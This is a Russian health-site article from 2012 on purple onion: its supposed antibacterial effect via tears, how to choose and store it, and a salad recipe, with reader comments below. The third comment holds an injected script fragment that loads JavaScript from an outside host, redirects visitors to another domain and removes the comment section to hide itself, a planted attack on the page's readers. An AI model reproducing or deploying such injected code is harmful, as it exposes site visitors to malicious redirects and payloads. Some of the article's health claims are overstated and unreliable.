Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Фиолетовый лук: против ви...  >>  Фиолетовый лук: против вирусов и микробов
 
Обратная связь
 

Фиолетовый лук: против вирусов и микробов

Размер шрифта
10 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Красный, синий, фиолетовый и даже ялтинский – названий много, суть одна: этот лук крайне полезен тем, что заставляет нас горько плакать, смывая со слезой все бактерии и вирусы со слизистых глаз и носа. Как выбрать, как хранить и как приготовить синий лук?

Этот сорт лука когда-то был привезен в Россию из Испании, затем прошел несколько этапов селекции. Сорт получился не только красивый по цвету, но и менее горький, чем обычный репчатый лук. Фиолетовый лук содержит сахар, а витамина С в нем в два раза больше, чем в яблоках. Кроме того, в этом луке содержатся фитонциды, летучие вещества, которые обладают противовоспалительными и противобактериальными свойствами. Сернистые вещества в синем луке предупреждают болезни сердца и сосудов.

Пьедестал почета по содержанию сахара

Репчатый лук
Синий лук
Зеленый лук

Синий лук слаще репчатого только потому, что в нем меньше веществ, придающих горечь.

В луке есть сернистые соединения. При разрезании в его клетках соединяются два вещества. Образуется серосодержащий газ. Попадая в глаза, он заставляет нас плакать. Слеза, соединяясь с этим сернистым газом, образует серную кислоту, которая и щиплет нам глаза. Благодаря этой защитной реакции вместе со слезой выходят все бактерии и вирусы со слизистых оболочек. Серная кислота выделяется в мизерных количествах, и не может причинить особого вреда нашим глазам, потому что разбавляется большим количеством слезной жидкости.

Как выбрать

Лук должен быть плотным и крепким. Внутри он более светлый, чем снаружи. Внешние слои – 5-6 штук, не больше – должны быть мясистыми, сочными.

Как хранить

Лук быстро портится, его надо хранить при комнатной температуре, но влажность в помещении не должна быть выше 60%. При таких условиях он будет в сохранности на протяжении 3-4 месяцев. Кстати, народный способ хранить лук в чулках – имеет смысл. Так лук не травмируется, не слеживается и все время проветривается. Можно хранить лук в ящиках, в коробках, пересыпанным луковой шелухой.

Как приготовить

При температурной обработке в течение нескольких минут лук теряет все полезные вещества. Так что лучше всего использовать этот продукт свежим в салатах. В принципе так и делается в странах Средиземноморья: в Италии и в Греции.

Салат с красным луком

Ингредиенты: брынзу, помидоры черри, листья салата, болгарский перец, оливки порезать крупно и заправить оливковым маслом и кольцами порезанный синий лук.

Сюжеты по теме:
Синий лук

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

10 апреля 2012 в 17:08

Цитировать   |   Пожаловаться

когда говорят "репчатый лук", имеют ввиду стеблеплод. Поэтому неуместна приведенная классификация на репчатый лук и синий лук: он весь репчатый!
а "зеленый лук" в этом контексте следует называть лук-перо, поскольку это уже другая часть растения.

Гость 10 апреля 2012 в 17:08
а "зеленый лук" в этом контексте следует называть лук-перо
 Спасибо Вам за внимание и ценные уточнения. 

3 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

1
6 продуктов для контроля аппетита Что есть, чтобы суставы не болели
От вас пахнет! Из-за этих 10 продуктов Что съесть зимой, чтобы не объесться и не заболеть
Чем накормить мужчину для эрекции Все что нужно женщине. Часть 3
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.